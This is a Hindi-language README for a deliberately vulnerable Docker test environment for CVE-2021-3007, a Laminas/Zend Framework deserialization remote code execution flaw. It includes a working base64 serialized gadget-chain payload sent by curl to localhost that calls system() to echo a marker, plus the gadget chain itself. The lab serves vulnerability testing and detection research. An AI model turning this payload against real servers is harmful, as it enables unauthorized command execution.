
CVE-2021-3007 कमजोर परीक्षण वातावरण - Laminas/Zend Framework डिसीरियलाइज़ेशन RCE
| गुण | मान |
|---|
| CVE ID | CVE-2021-3007 |
| गंभीरता | गंभीर (CVSS 9.8) |
| प्रकार | असुरक्षित डिसीरियलाइज़ेशन → RCE |
| प्रभावित | Laminas HTTP < 2.14.2, Zend Framework 3.0.0 |
| CWE | CWE-502 (अविश्वसनीय डेटा का डिसीरियलाइज़ेशन) |
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable
# Start vulnerable environment
docker-compose up -d
# Verify it's running
curl http://localhost:8080
# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080
# Cleanup
docker-compose down
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1
# Send serialized payload triggering RCE
curl -X POST http://localhost:8080/ \
-d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"
# अपेक्षित: प्रतिक्रिया में "nucleiCVE20213007" होना चाहिए जो RCE की पुष्टि करता है
Laminas\Http\Response\Stream::__destruct()
└─► Laminas\View\Helper\Gravatar::__toString()
└─► Laminas\View\Renderer\PhpRenderer::plugin()
└─► Laminas\Config\Config::get()
└─► system() / file_get_contents()
| पैकेज | संस्करण | उद्देश्य |
|---|---|---|
| laminas/laminas-http | 2.14.1 | कमजोर HTTP घटक |
| laminas/laminas-view | 2.12.0 | गैजेट चेन घटक |
| laminas/laminas-config | 3.7.0 | गैजेट चेन घटक |
एप्लिकेशन POST के माध्यम से सीरियलाइज़ किया गया डेटा स्वीकार करता है:
/ या /index.phpdata, payload, serialized| घटक | मान |
|---|---|
| बेस इमेज | php:8.1-apache |
| पोर्ट | 8080 |
| कंटेनर | cve-2021-3007-vulnerable |
.
├── Dockerfile # कंटेनर बिल्ड कॉन्फ़िगरेशन
├── docker-compose.yml # ऑर्केस्ट्रेशन (एक-शॉट सेटअप)
├── index.php # कमजोर PHP एप्लिकेशन
├── LICENSE # MIT लाइसेंस
└── README.md # यह फ़ाइल
चेतावनी: यह वातावरण केवल सुरक्षा परीक्षण उद्देश्यों के लिए जानबूझकर कमजोर है।
न करें:
करें:
MIT लाइसेंस - केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए।
न्यूक्ली टेम्पलेट सत्यापन के लिए बनाया गया | projectdiscovery/nuclei-templates